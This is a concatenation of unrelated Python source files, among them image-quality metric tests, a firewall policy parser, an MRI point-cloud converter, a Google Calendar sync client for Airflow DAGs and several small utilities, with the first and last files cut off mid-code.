information_weighted_ssim(x_scaled.to(device), y_scaled.to(device), data_range=1.0)
@pytest.mark.parametrize(
"dtype", [torch.float32, torch.float64],
)
def test_iw_ssim_preserves_dtype(x_rand: torch.Tensor, y_rand: torch.Tensor, dtype: torch.dtype, device: str) -> None:
output = information_weighted_ssim(x_rand.to(device=device, dtype=dtype), y_rand.to(device=device, dtype=dtype))
assert output.dtype == dtype
def test_iw_ssim_corresponds_to_matlab(test_images: List, device: str):
x_gray, y_gray = test_images[0]
x_rgb, y_rgb = test_images[1]
matlab_gray = torch.tensor(0.886297251092821, device=device)
matlab_rgb = torch.tensor(0.946804801436296, device=device)
score_gray = information_weighted_ssim(x_gray.to(device), y_gray.to(device), data_range=255)
assert torch.isclose(score_gray, matlab_gray, atol=1e-5),\
f'Expected {matlab_gray:.4f}, got {score_gray:.4f} for gray scale case.'
score_rgb = information_weighted_ssim(x_rgb.to(device), y_rgb.to(device), data_range=255)
assert torch.isclose(score_rgb, matlab_rgb, atol=1e-5),\
f'Expected {matlab_rgb:.8f}, got {score_rgb:.8f} for rgb case.'
# ================== Test class: `InformationWeightedSSIMLoss` ==================
def test_iw_ssim_loss_is_one_for_equal_tensors(x_rand: torch.Tensor, device: str) -> None:
x_rand = x_rand.to(device)
y_rand = x_rand.clone()
loss = InformationWeightedSSIMLoss(data_range=1.)
measure = loss(x_rand, y_rand)
assert torch.allclose(measure, torch.zeros_like(measure), atol=1e-5), \
f'If equal tensors are passed IW-SSIM must be equal to 0 ' \
f'(considering floating point operation error up to 1 * 10^-5), got {measure}'
def test_iw_ssim_loss_reduction(x_rand: torch.Tensor, y_rand: torch.Tensor, device: str) -> None:
for mode in ['mean', 'sum', 'none']:
loss = InformationWeightedSSIMLoss(reduction=mode)
loss(x_rand.to(device), y_rand.to(device))
for mode in [None, 'n', 2]:
with pytest.raises(ValueError):
loss = InformationWeightedSSIMLoss(reduction=mode)
loss(x_rand.to(device), y_rand.to(device))
def test_iw_ssim_loss_raises_if_tensors_have_different_shapes(x_rand: torch.Tensor, y_rand: torch.Tensor,
scale_weights: torch.Tensor, device: str) -> None:
dims = [[3], [2, 3], [160, 161], [160, 161]]
loss = InformationWeightedSSIMLoss(data_range=1.)
for size in list(itertools.product(*dims)):
wrong_shape_x = torch.rand(size).to(x_rand)
print(wrong_shape_x.size())
if wrong_shape_x.size() == x_rand.size():
loss(wrong_shape_x.to(device), x_rand.to(device))
else:
with pytest.raises(AssertionError):
loss(wrong_shape_x.to(device), x_rand.to(device))
loss = InformationWeightedSSIMLoss(data_range=1., scale_weights=scale_weights.to(device))
loss(x_rand.to(device), y_rand.to(device))
wrong_scale_weights = torch.rand(2, 2)
loss = InformationWeightedSSIMLoss(data_range=1., scale_weights=wrong_scale_weights.to(device))
with pytest.raises(ValueError):
loss(x_rand.to(device), y_rand.to(device))
def test_iw_ssim_loss_raises_if_tensors_have_different_types(x_rand: torch.Tensor, device: str) -> None:
wrong_type_x = list(range(10))
loss = InformationWeightedSSIMLoss(data_range=1.)
with pytest.raises(AssertionError):
loss(wrong_type_x, x_rand.to(device))
def test_iw_ssim_loss_raises_if_kernel_size_greater_than_image(x_rand: torch.Tensor, y_rand: torch.Tensor,
device: str) -> None:
kernel_size = 11
levels = 5
min_size = (kernel_size - 1) * 2 ** (levels - 1) + 1
wrong_size_x = x_rand[:, :, :min_size - 1, :min_size - 1]
wrong_size_y = y_rand[:, :, :min_size - 1, :min_size - 1]
loss = InformationWeightedSSIMLoss(data_range=1., kernel_size=kernel_size)
with pytest.raises(ValueError):
loss(wrong_size_x.to(device), wrong_size_y.to(device))
@pytest.mark.parametrize(
"data_range", [128, 255],
)
def test_iw_ssim_loss_supports_different_data_ranges(x_rand: torch.Tensor, y_rand: torch.Tensor, data_range: int,
device: str) -> None:
x_scaled = (x_rand * data_range).type(torch.uint8)
y_scaled = (y_rand * data_range).type(torch.uint8)
loss = InformationWeightedSSIMLoss(data_range=1.)
loss_scaled = InformationWeightedSSIMLoss(data_range=data_range)
measure_scaled = loss_scaled(x_scaled.to(device), y_scaled.to(device))
measure = loss(
x_scaled.to(device) / float(data_range),
y_scaled.to(device) / float(data_range)
)
diff = torch.abs(measure_scaled - measure)
assert (diff <= 1e-6).all(), f'Result for same tensor with different data_range should be the same, got {diff}'
def test_iw_ssim_loss_fails_for_incorrect_data_range(x_rand: torch.Tensor, y_rand: torch.Tensor, device: str) -> None:
# Scale to [0, 255]
x_scaled = (x_rand * 255).type(torch.uint8)
y_scaled = (y_rand * 255).type(torch.uint8)
loss = InformationWeightedSSIMLoss(data_range=1.)
with pytest.raises(AssertionError):
loss(x_scaled.to(device), y_scaled.to(device))
@pytest.mark.parametrize(
"dtype", [torch.float32, torch.float64],
)
def test_iw_ssim_loss_preserves_dtype(x_rand: torch.Tensor, y_rand: torch.Tensor, dtype: torch.dtype,
device: str) -> None:
loss = InformationWeightedSSIMLoss(data_range=1.)
output = loss(x_rand.to(device=device, dtype=dtype), y_rand.to(device=device, dtype=dtype))
assert output.dtype == dtype
def test_iw_ssim_loss_corresponds_to_matlab(test_images: List, device: str):
x_gray, y_gray = test_images[0]
x_rgb, y_rgb = test_images[1]
matlab_gray = 1 - torch.tensor(0.886297251092821, device=device)
matlab_rgb = 1 - torch.tensor(0.946804801436296, device=device)
loss = InformationWeightedSSIMLoss(data_range=255)
score_gray = loss(x_gray.to(device), y_gray.to(device))
assert torch.isclose(score_gray, matlab_gray, atol=1e-5),\
f'Expected {matlab_gray:.8f}, got {score_gray:.8f} for gray scale case.'
score_rgb = loss(x_rgb.to(device), y_rgb.to(device))
assert torch.isclose(score_rgb, matlab_rgb, atol=1e-5),\
f'Expected {matlab_rgb:.8f}, got {score_rgb:.8f} for rgb case.'
def test_iw_ssim_loss_backprop(x_rand: torch.Tensor, y_rand: torch.Tensor, device: str):
x_rand.requires_grad_(True)
loss = InformationWeightedSSIMLoss(data_range=1.)
score_gray = loss(x_rand.to(device), y_rand.to(device))
score_gray.backward()
assert torch.isfinite(x_rand.grad).all(), f'Expected finite gradient values, got {x_rand.grad}.'
|
1620309
|
from main import absorbdict
# If the source or destination IP is "Any" and its zone is something other than Untrust, that policy is added to the list (Any * 2) times
# If the source or destination IP is a VIP and the protocol is "ANY", that policy is added to the list once per matching VIP
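# Illustrative sketch (hypothetical policy values; the keys match those read by the
# confirm_*_element functions below):
#   policy = {'src_ip': '"Any"', 'src_zone': '"Trust"', 'dst_ip': '"Web-SV"',
#             'dst_zone': '"Untrust"', 'protocol': '"HTTP"'}
# confirm_src_address_element() returns 2 for this policy (Any in a non-Untrust zone),
# so append_data_to_list() appends the row 2 * dst_element_num * service_element_num times.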
service_element_num = 1
src_address_element_num = 1
dst_address_element_num = 1
pre_services = {'"PING"': {"icmp": ''},
'"ICMP-ANY"': {"icmp": ''},
'"FTP"': {"tcp": '21'},
'"SSH"': {"tcp": '22'},
'"TELNET"': {"tcp": '23'},
'"SMTP"': {"tcp": '25'},
'"MAIL"': {"tcp": '25'},
'"DNS"': {"tcp": '53', "udp": '53'},
'"TFTP"': {"tcp": '69'},
'"HTTP"': {"tcp": '80'},
'"POP3"': {"tcp": '110'},
'"NTP"': {"tcp": '123', "udp": '123'},
'"MS-RPC-EPM"': {"tcp": '135', "udp": '135'},
'"NBNAME"': {"udp": '137'},
'"NBDS"': {"udp": '138'},
'"SMB"': {"tcp": ['139', '445']},
'"IMAP"': {"tcp": '143'},
'"SNMP"': {"tcp": ['161', '162'], "udp": ['161', '162']},
'"LDAP"': {"tcp": '389'},
'"HTTPS"': {"tcp": '443'},
'"IKE"': {"udp": '500'},
'"SYSLOG"': {"udp": '514'},
'"TALK"': {"udp": ['517', '518']},
'"MS-SQL"': {"tcp": '1433'},
'"WINFRAME"': {"tcp": '1494'},
'"L2TP"': {"udp": '1701'},
'"H.323"': {"tcp": '1720'},
'"PPTP"': {"tcp": '1723'},
'"RADIUS"': {"udp": ['1812', '1813']},
'"SIP"': {"tcp": '5060', "udp": '5060'},
'"X-WINDOWS"': {"tcp": '6000'},
'"HTTP-EXT"': {"tcp": '8000'},
'"TRACEROUTE"': {"icmp": '', "udp": '33400'},
'"TCP-ANY"': {"tcp": '65535'},
'"UDP-ANY"': {"udp": '65535'}}
def confirm_service_name(service_name):
global service_list
service_list = []
if len(absorbdict.group_service_dict) >= 2:
flags = False
for group_service_c in absorbdict.group_service_dict:
if service_name == group_service_c['group_service_name']:
flags = True
service_element_name = group_service_c['service_name']
flag = False
for group_service2_c in absorbdict.group_service_dict:
if service_element_name == group_service2_c['group_service_name']:
flag = True
service_list += [group_service2_c['service_name']]
continue
else:
if not flag:
service_list += [service_element_name]
continue
else:
if not flags:
service_list += [service_name]
else:
service_list += [service_name]
return service_list
def count_setting_service_element_num(service_list_c):
global service_element_num
for service_c in absorbdict.service_dict:
if service_list_c == service_c['service_name']:
service_element_num += 1
continue
return service_element_num
def count_service_element_num(service_name):
global service_element_num
service_element_num = 0
confirm_service_name(service_name)
for service_list_c in service_list:
flag = False
for pre_service_name, port_num in pre_services.items():
if service_list_c == pre_service_name:
#print(pre_service_name, service_element_num)
flag = True
count_pre_service_element(pre_service_name)
service_element_num += pre_service_element_num
else:
if not flag:
#print(service_list_c)
handle_setting_service_name(service_list_c)
return service_element_num
def confirm_service_element(service_name):
    # returns service_list broken down to the service_name level
count_service_element_num(service_name)
    # processes each element in service_list and returns service_element_num
return service_element_num
def handle_setting_service_name(service_list_c):
global service_element_num
flag = False
for service_c in absorbdict.service_dict:
if service_list_c == service_c['service_name']:
flag = True
service_element_num += 1
else:
if not flag:
service_element_num += 1
return service_element_num
def confirm_pre_service_used_protocol(pre_service_name):
global pre_service_used_protocol
for pre_service, port_num_dict in pre_services.items():
if pre_service_name == pre_service:
pre_service_used_protocol = port_num_dict
return pre_service_used_protocol
def count_pre_service_element(pre_service_name):
global pre_service_element_num
confirm_pre_service_used_protocol(pre_service_name)
pre_service_element_num = 0
for k, v in pre_service_used_protocol.items():
if type(v) == list:
pre_service_element_num += len(v)
else:
pre_service_element_num += 1
return pre_service_element_num
def count_group_address_element(group_name):
global address_element_num
address_element_num = 0
for group_address_c in absorbdict.group_address_dict:
if group_name == group_address_c['group_name']:
address_element_name = group_address_c['address_name']
flag = False
c = 0
for group_address2_c in absorbdict.group_address_dict:
if address_element_name == group_address2_c['group_name']:
flag = True
c += 1
else:
if flag:
address_element_num += c
else:
flag = False
for address_c in absorbdict.address_dict:
if address_element_name == address_c['address_name']:
d = address_c
address_element_num += 1
flag = True
else:
if not flag:
d = group_address_c
address_element_num += list(
d.values()).count(group_name)
else:
return address_element_num
def judge_src_address_name(address_name):
global src_address_element_num
for group_address_c in absorbdict.group_address_dict:
if group_address_c['group_name'] == address_name:
group_name = group_address_c['group_name']
count_group_address_element(group_name)
src_address_element_num = address_element_num
break
else:
src_address_element_num = 1
continue
else:
return src_address_element_num
def judge_dst_address_name(address_name):
global dst_address_element_num
for group_address_c in absorbdict.group_address_dict:
if group_address_c['group_name'] == address_name:
group_name = group_address_c['group_name']
count_group_address_element(group_name)
dst_address_element_num = address_element_num
break
else:
dst_address_element_num = 1
continue
else:
return dst_address_element_num
def append_data_to_list(append_list, data, src_element_num, dst_element_num, service_element_num):
append_list += [data] * src_element_num * \
dst_element_num * service_element_num
# Pass the data to the functions that count each element, then append the data to the list according to the returned counts
def handle_multiple_ip(policy, append_list, data):
global service_element_num
src_address = policy['src_ip']
dst_address = policy['dst_ip']
confirm_src_address_element(policy, src_address)
confirm_dst_address_element(policy, dst_address)
service_name = policy['protocol']
confirm_service_element(service_name)
append_data_to_list(append_list, data, src_element_num,
dst_element_num, service_element_num)
def confirm_src_vip_element(policy):
global src_element_num
src_element_num = 0
for vip_c in absorbdict.vip_dict:
if policy['src_ip'].strip(')"').split('(')[1] == vip_c['if_name']:
if vip_c['global_ip'] == "interface-ip" and policy['protocol'] == '"ANY"':
src_element_num += 1
continue
elif vip_c['global_ip'] == "interface-ip" and vip_c['service_name'] == policy['protocol']:
src_element_num += 1
elif policy['src_ip'].strip(')"').split('(')[1] == vip_c['global_ip']:
if policy['protocol'] == '"ANY"':
src_element_num += 1
continue
elif vip_c['service_name'] == policy['protocol']:
src_element_num += 1
else:
return src_element_num
def confirm_src_address_element(policy, src_address):
global src_element_num
if policy['src_ip'] == '"Any"' and 'Untrust"' not in policy['src_zone']:
src_element_num = 2
elif "VIP(" in policy['src_ip'] and policy['protocol'] == '"ANY"':
confirm_src_vip_element(policy)
else:
if absorbdict.group_address_dict != []:
address_name = src_address
judge_src_address_name(address_name)
src_element_num = src_address_element_num
else:
src_element_num = 1
return src_element_num
def confirm_dst_vip_element(policy):
global dst_element_num
dst_element_num = 0
for vip_c in absorbdict.vip_dict:
if policy['dst_ip'].strip(')"').split('(')[1] == vip_c['if_name']:
if vip_c['global_ip'] == "interface-ip" and policy['protocol'] == '"ANY"':
dst_element_num += 1
continue
elif vip_c['global_ip'] == "interface-ip" and vip_c['service_name'] == policy['protocol']:
dst_element_num += 1
elif policy['dst_ip'].strip(')"').split('(')[1] == vip_c['global_ip']:
if policy['protocol'] == '"ANY"':
dst_element_num += 1
continue
elif vip_c['service_name'] == policy['protocol']:
dst_element_num += 1
else:
return dst_element_num
def confirm_dst_address_element(policy, dst_address):
global dst_element_num
    # TODO: fix element_num; using a zone that has no IP assigned currently produces duplicated output
if policy['dst_ip'] == '"Any"' and 'Untrust"' not in policy['dst_zone']:
dst_element_num = 2
elif "VIP(" in policy['dst_ip'] and policy['protocol'] == '"ANY"':
confirm_dst_vip_element(policy)
else:
if absorbdict.group_address_dict != []:
address_name = dst_address
judge_dst_address_name(address_name)
dst_element_num = dst_address_element_num
else:
dst_element_num = 1
return dst_element_num
|
1620330
|
from sklearn.neighbors import KDTree
from os.path import join, exists, dirname, abspath
import numpy as np
import pandas as pd
import os, sys, glob, pickle
import nibabel as nib
from multiprocessing import Process
import concurrent.futures
from tqdm import tqdm
from scipy import ndimage
import argparse
BASE_DIR = dirname(abspath(__file__))
ROOT_DIR = dirname(BASE_DIR)
sys.path.append(BASE_DIR)
sys.path.append(ROOT_DIR)
from helper_ply import write_ply
from helper_tool import DataProcessing as DP
import time
typeimg = ['t1ce','t1', 'flair', 't2', 'seg']
sub_grid_size = 0.01
out_format = '.ply'
parallel = False
dataTraining = True
n_point = 365000
def load_volume(ID):
def itensity_normalize_one_volume(volume):
"""
        normalize the intensity of an nd volume based on the mean and std of the nonzero region
inputs:
volume: the input nd volume
outputs:
out: the normalized nd volume
"""
pixels = volume[volume > 0]
mean = pixels.mean()
std = pixels.std()
out = (volume - mean)/std
# random normal too slow
#out_random = np.random.normal(0, 1, size = volume.shape)
out_random = np.zeros(volume.shape)
out[volume == 0] = out_random[volume == 0]
return out
path_volume = os.path.join(dataset_path, ID, ID)
output_volume = np.empty((5,240,240,155))
#Load and process image
for i,mod in enumerate(typeimg[:-1]):
path_mod = str(path_volume+'_'+mod+'.nii.gz')
img = np.asanyarray(nib.load(path_mod).dataobj)
img = itensity_normalize_one_volume(img)
output_volume[i] = img
if dataTraining:
path_mod = str(path_volume+'_'+typeimg[-1]+'.nii.gz')
img = np.asanyarray(nib.load(path_mod).dataobj)
img[img==4]=3
output_volume[4] = img
else:
path_mask = os.path.join(attention_mask_path, ID+'.nii.gz')
mask = np.asanyarray(nib.load(path_mask).dataobj)
mask = mask.astype(np.uint8)
output_volume[4] = mask
return output_volume
def convert_pc2ply(volume,ID):
channel,x_axis, y_axis, z_axis = volume.shape
data_list = [[x,y,z,volume[0][x][y][z],volume[1][x][y][z],volume[2][x][y][z],volume[3][x][y][z],volume[4][x][y][z]] for x in range(x_axis) for y in range(y_axis) for z in range(z_axis) if (volume[0][x][y][z] != 0 or volume[1][x][y][z] != 0 or volume[2][x][y][z] != 0 or volume[3][x][y][z] != 0)]
pc_data = np.array(data_list)
xyz_origin = pc_data[:,:3].astype(int)
np.save(os.path.join(sub_pc_folder, ID+"_xyz_origin.npy"), xyz_origin)
xyz_min = np.array([x_axis,y_axis,z_axis])
pc_data[:, 0:3] /= xyz_min
xyz = pc_data[:, :3].astype(np.float32)
colors = pc_data[:, 3:7].astype(np.float32)
labels = pc_data[:,7].astype(np.uint8)
(unique, counts) = np.unique(labels, return_counts=True)
print(ID," n point ", len(labels),unique, counts )
#write full ply
write_ply(os.path.join(original_pc_folder, ID+out_format), (xyz, colors, labels), ['x', 'y', 'z', 't1ce', 't1', 'flair', 't2' ,'class'])
# save sub_cloud and KDTree file
sub_xyz, sub_colors, sub_labels = DP.grid_sub_sampling(xyz, colors, labels, sub_grid_size)
#write sub ply
write_ply(os.path.join(sub_pc_folder, ID+out_format), [sub_xyz, sub_colors, sub_labels], ['x', 'y', 'z', 't1ce', 't1', 'flair', 't2' ,'class'])
kd_tree_file = os.path.join(sub_pc_folder, ID+ '_KDTree.pkl')
search_tree = KDTree(sub_xyz)
with open(kd_tree_file, 'wb') as f:
pickle.dump(search_tree, f)
proj_idx = np.squeeze(search_tree.query(xyz, return_distance=False))
proj_idx = proj_idx.astype(np.int32)
proj_save = os.path.join(sub_pc_folder, ID+ '_proj.pkl')
with open(proj_save, 'wb') as f:
pickle.dump([proj_idx, labels], f)
def process_data_and_save(ID):
convert_pc2ply(load_volume(ID),ID)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--n_point', type=int, default=365000, help='The number of points cloud ')
parser.add_argument('--data_3D_path', type=str, default=0, help='Path to the 3D volume data')
parser.add_argument('--outPC_path', type=str, default='train', help='Path of output points cloud data')
FLAGS = parser.parse_args()
dataset_path = FLAGS.data_3D_path
outPC_path = FLAGS.outPC_path
n_point = FLAGS.n_point
original_pc_folder = os.path.join(outPC_path,"original_ply")
sub_pc_folder = os.path.join(outPC_path,"input0.01")
attention_mask_path = None # you can modify to path binary of the attention network during the inference process
if not exists(original_pc_folder):
os.makedirs(original_pc_folder)
if not exists(sub_pc_folder):
os.makedirs(sub_pc_folder)
list_ID = os.listdir(dataset_path)
if parallel:
with concurrent.futures.ProcessPoolExecutor(50) as executor:
tqdm(executor.map(process_data_and_save, list_ID), total=len(list_ID))
else:
for i,ID in enumerate(list_ID):
process_data_and_save(ID)
|
1620354
|
from hathor.conf import HathorSettings
from hathor.simulator import FakeConnection
from tests import unittest
settings = HathorSettings()
class SyncV1HathorCapabilitiesTestCase(unittest.SyncV1Params, unittest.TestCase):
def test_capabilities(self):
network = 'testnet'
manager1 = self.create_peer(network, capabilities=[settings.CAPABILITY_WHITELIST])
manager2 = self.create_peer(network, capabilities=[])
conn = FakeConnection(manager1, manager2)
# Run the p2p protocol.
for _ in range(100):
conn.run_one_step(debug=True)
self.clock.advance(0.1)
# Even if we don't have the capability we must connect because the whitelist url conf is None
self.assertEqual(conn._proto1.state.state_name, 'READY')
self.assertEqual(conn._proto2.state.state_name, 'READY')
manager3 = self.create_peer(network, capabilities=[settings.CAPABILITY_WHITELIST])
manager4 = self.create_peer(network, capabilities=[settings.CAPABILITY_WHITELIST])
conn2 = FakeConnection(manager3, manager4)
# Run the p2p protocol.
for _ in range(100):
conn2.run_one_step(debug=True)
self.clock.advance(0.1)
self.assertEqual(conn2._proto1.state.state_name, 'READY')
self.assertEqual(conn2._proto2.state.state_name, 'READY')
class SyncV2HathorCapabilitiesTestCase(unittest.SyncV2Params, unittest.TestCase):
__test__ = True
# sync-bridge should behave like sync-v2
class SyncBridgeHathorCapabilitiesTestCase(unittest.SyncBridgeParams, SyncV2HathorCapabilitiesTestCase):
pass
|
1620361
|
from typing import List
from .asset import Asset
from .jinja_renderer import JinjaRenderer
from .logging import getLogger
from .paths import Paths
from .process import fail
from .factset import Factset
logger = getLogger(__name__)
paths = Paths()
class Assetset():
"""A collection of Assets (external files) for use in a build."""
def __init__(self, assets: List[Asset]) -> None:
self.assets = assets
logger.debug(f'New Assetset: {self}')
@classmethod
def from_config(cls, config: List[dict]=[], facts: Factset=Factset()):
"""Create an Assetset using a configuration block in tedi.yml
The YAML form looks like this:
- filename: bigball.tar.gz
source: http://example.org/downloads/bigball-v1.tar.gz
- filename: mince_pie
source: file:///usr/local/pies/{{ pie_type_fact }}
This method accepts the above data structure as a Python list. It also
arranges for template tokens in the configuration to be expanded, using
the facts available in the Factset.
"""
assets = []
renderer = JinjaRenderer(facts)
for asset in config:
if 'filename' not in asset or 'source' not in asset:
logger.critical('Each asset must declare "filename" and "source".')
fail()
# Expand any facts in the asset declaration.
filename = renderer.render_string(asset['filename'])
source = renderer.render_string(asset['source'])
assets.append(Asset(filename, source))
return cls(assets)
def __repr__(self) -> str:
return f'Assetset({self.assets})'
def acquire(self) -> None:
"""Acquire (download) all the assets in this Assetset."""
for asset in self.assets:
asset.acquire(paths.assets_path)
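# A minimal usage sketch (hypothetical config values) tying from_config() and
# acquire() together; the config shape follows the YAML form in the docstring above:
#   assets = Assetset.from_config(
#       config=[{'filename': 'bigball.tar.gz',
#                'source': 'http://example.org/downloads/bigball-v1.tar.gz'}],
#       facts=Factset())
#   assets.acquire()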
|
1620371
|
from .TftEndpoint import TftEndpoint
class SummonerEndpoint(TftEndpoint):
def __init__(self, url: str, **kwargs):
nurl = "/summoner/v1/summoners" + url
super().__init__(nurl, **kwargs)
class SummonerApiUrls:
by_account = SummonerEndpoint("/by-account/{encrypted_account_id}")
by_name = SummonerEndpoint("/by-name/{summoner_name}")
by_puuid = SummonerEndpoint("/by-puuid/{puuid}")
by_id = SummonerEndpoint("/{encrypted_summoner_id}")
|
1620392
|
from sqlalchemy import Column, String, Boolean, Integer, ForeignKey, Text
from sqlalchemy.orm import relationship
from app.models.base import Base
class PredictBuildings(Base):
gid = Column(Integer, primary_key=True, autoincrement=True)
geom = Column(Text)
task_id = Column(Integer, primary_key=True)
extent = Column(String(256))
user_id = Column(String(50))
area_code = Column(String(50))
state = Column(Integer, default=1)
status = Column(Integer, default=1)
|
1620408
|
import cv2 as cv
import numpy as np
img = cv.imread(r'C:\Users\PIYUS\Desktop\Image Processing\learning\Resources\Photos\park.jpg')
cv.imshow("Img", img)
blank = np.zeros(img.shape[:2], dtype='uint8')
b , g , r = cv.split(img)
# even after splitting, how do we get the actual color back in each channel image?
blue = cv.merge([b, blank, blank])
green = cv.merge([blank, g, blank])
red = cv.merge([blank, blank, r])
cv.imshow("Blue", blue) # for blue, there is high concentration of blue in sky but very low of it in trees
cv.imshow("Green", green)
cv.imshow("Red", red)
# print(img.shape)# (427, 640, 3) The 3 is for 3 color channels
# print(b.shape)
# print(g.shape)
# print(r.shape)
# (427, 640)
# (427, 640)
# (427, 640)
merged = cv.merge([b,g,r])
cv.imshow("merged", merged)
cv.waitKey(0)
|
1620434
|
from __future__ import unicode_literals
from django.utils.safestring import mark_safe
def setting_widget(instance):
return mark_safe(
'''
<strong>{}</strong>
<p class="small">{}</p>
'''.format(instance, instance.help_text or '')
)
|
1620456
|
import time
import pickle
from pathlib import Path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from googleapiclient.errors import HttpError
from aircal.export import INSERT_ACTION, UPDATE_ACTION, DELETE_ACTION
SCOPES = ['https://www.googleapis.com/auth/calendar']
TITLE_PREFIX = 'DAG:'
class GCalClient(object):
def __init__(self, calendar_id, creds_dir, logger, max_results=2000):
creds = self._auth(creds_dir)
self.calendar_id = calendar_id
self.service = build('calendar', 'v3', credentials=creds)
self.max_results = max_results
self.logger = logger
def _auth(self, creds_dir):
creds = None
token_path = creds_dir / 'token.pickle'
creds_path = creds_dir / 'credentials.json'
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if token_path.exists():
with open(token_path, 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(creds_path, SCOPES)
creds = flow.run_local_server(port=0)
with open(token_path, 'wb') as token:
pickle.dump(creds, token)
return creds
def create_event(self, dag_id, start_date, end_date):
event = {
'summary': 'DAG: %s' % dag_id,
'start': {
'dateTime': start_date.strftime('%Y-%m-%dT%H:%M:0'),
'timeZone': 'Etc/UTC',
},
'end': {
'dateTime': end_date.strftime('%Y-%m-%dT%H:%M:0'),
'timeZone': 'Etc/UTC',
}
}
event = self.service.events().insert(calendarId=self.calendar_id, body=event).execute()
return event['status']
def delete_event(self, event_id):
self.service.events().delete(calendarId=self.calendar_id, eventId=event_id).execute()
return 'deleted'
def update_event(self, event_id, dag_id, start_date, end_date):
event = {
'summary': 'DAG: %s' % dag_id,
'start': {
'dateTime': start_date.strftime('%Y-%m-%dT%H:%M:0'),
'timeZone': 'Etc/UTC',
},
'end': {
'dateTime': end_date.strftime('%Y-%m-%dT%H:%M:0'),
'timeZone': 'Etc/UTC',
}
}
event = self.service.events().update(calendarId=self.calendar_id, eventId=event_id, body=event).execute()
return event['status']
def do_sync(self, v):
for i in range(3):
try:
if v.action == INSERT_ACTION:
self.create_event(v.dag_id, v.start_date, v.end_date)
elif v.action == DELETE_ACTION:
self.delete_event(v.event_id)
elif v.action == UPDATE_ACTION:
self.update_event(v.event_id, v.dag_id, v.start_date, v.end_date)
else:
raise Exception('action not supported')
except HttpError as ex:
print(ex)
                self.logger.error('HTTP exception occurred, retrying')
time.sleep(10**(i+1))
else:
return 0
return 1
def get_events(self, base_date):
events_result = self.service.events().list(
calendarId=self.calendar_id, maxResults=self.max_results,
timeMin=base_date, singleEvents=True, orderBy='startTime'
).execute()
events = events_result.get('items', [])
if len(events) == self.max_results:
raise Exception((
                'The number of retrieved events equals max_results. Some events might be ignored. '
'Consider increasing max_results parameter or decrease n_horizon_days.'))
elig_events = [v for v in events if v.get('summary', '').startswith(TITLE_PREFIX)]
for event in elig_events:
event['summary'] = event['summary'].replace(TITLE_PREFIX, '').strip()
return elig_events
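# Minimal usage sketch (hypothetical calendar id, credentials directory and date;
# the constructor and get_events signatures are the ones defined above):
#   import logging
#   client = GCalClient('primary', Path('~/.aircal').expanduser(), logging.getLogger('aircal'))
#   upcoming = client.get_events('2024-01-01T00:00:00Z')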
|
1620473
|
import argparse
def get_parser():
"""Returns an arguments parser"""
parser = argparse.ArgumentParser(description="Background Matting on Videos.")
parser.add_argument(
"-n", "--name", type=str, required=True, help="Name of processing."
)
parser.add_argument(
"-i", "--input", type=str, required=True, help="Path to videos folder."
)
parser.add_argument(
"-o",
"--output_dir",
type=str,
required=True,
help="Directory to save the output results.",
)
parser.add_argument(
"-s",
"--start",
type=str,
default="00",
help="Start point to process (in seconds). Default 0.",
)
parser.add_argument(
"-d",
"--duration",
type=str,
default="-1",
help="Duration of the processed video (in seconds). Set to '-1' to process till"
" the end of the video. Default '-1'.",
)
parser.add_argument(
"-pt",
"--proportional_threshold",
type=str,
default=None,
help="Comma separated list to set which videos must be split in two according"
" to a proportional threshold before processing. For example, for two videos "
"where we want to split the first one (alphabetical order) at the person half,"
' set this parameter to "0.5" or "0.5,',
)
parser.add_argument(
"-ft",
"--fixed_threshold",
type=str,
default=None,
help="Colon separated list to set which videos must be split in two by a fixed"
" threshold before processing. For example, for two videos where we want to "
"split the first one (alphabetical order) by the line 640, set this parameter "
'to "640" or "640:".',
)
parser.add_argument(
"-shp",
"--sharpen",
type=bool,
default=False,
help="Enable sharpen original color image to help on noise removal. Default to "
"False.",
)
parser.add_argument(
"-mask_ops",
"--mask_ops",
type=str,
default="",
help="Morphological operations to apply to masks for each video. Format "
"[erode|dilate],KernelSize,Iterations;...;blur,KernelSize,SigmaX:[...]. Default"
' "erode,3,10;dilate,5,5;blur,31,0" for each video. Specify "-" to not use any '
"morphological operation on the mask.",
)
parser.add_argument(
"-o_types",
"--output_types",
type=str,
default="out,matte",
help="Output types generation separated by comma. Valid values are out,matte,"
'compose,fg. Default "out,matte".',
)
parser.add_argument(
"-bg",
"--background",
type=str,
help="Path to background video directory for compose output.",
)
parser.add_argument(
"--kinect_mask",
dest="kinect_mask",
action="store_true",
help="Enable the use of azure kinect mask (Default).",
)
parser.add_argument(
"--no_kinect_mask",
dest="kinect_mask",
action="store_false",
help="Disble the use of azure kinect mask.",
)
parser.set_defaults(kinect_mask=True)
parser.add_argument(
"-i_ext",
"--input_extension",
type=str,
default="mp4",
help="Input videos extension. Only if not using Azure Kinect videos.",
)
return parser
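# Minimal usage sketch (hypothetical argument values; the flags are the ones
# defined above, and "out,matte" is the documented default for --output_types):
#   parser = get_parser()
#   args = parser.parse_args(['-n', 'run1', '-i', 'videos/', '-o', 'results/'])
#   print(args.output_types)  # -> 'out,matte'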
|
1620492
|
from database.conn import db
from database.models import RawFacebookComments, RawTwitterComments, RawInstagramComments, RawYouTubeComments, RawHashtagComments
from peewee import *
from playhouse.migrate import *
if __name__ == "__main__":
db.connect()
db.create_tables([
RawFacebookComments,
RawTwitterComments,
RawInstagramComments,
RawYouTubeComments,
RawHashtagComments,
])
    # Example, in case some table needs to be updated
# with db.atomic():
# migrator = SqliteMigrator(db)
# migrate(
# migrator.add_column('raw_facebook_comments', 'clean_comment', TextField(default='')),
# migrator.add_column('raw_twitter_comments', 'clean_comment', TextField(default='')),
# migrator.add_column('raw_instagram_comments', 'clean_comment', TextField(default='')),
# migrator.add_column('raw_youtube_comments', 'clean_comment', TextField(default='')),
# migrator.add_column('raw_hashtag_comments', 'clean_comment', TextField(default='')),
# )
|
1620547
|
from cs231n.layers import *
from cs231n.fast_layers import *
def affine_relu_forward(x, w, b):
"""
    Convenience layer that performs an affine transform followed by a ReLU
Inputs:
- x: Input to the affine layer
- w, b: Weights for the affine layer
Returns a tuple of:
- out: Output from the ReLU
- cache: Object to give to the backward pass
"""
a, fc_cache = affine_forward(x, w, b)
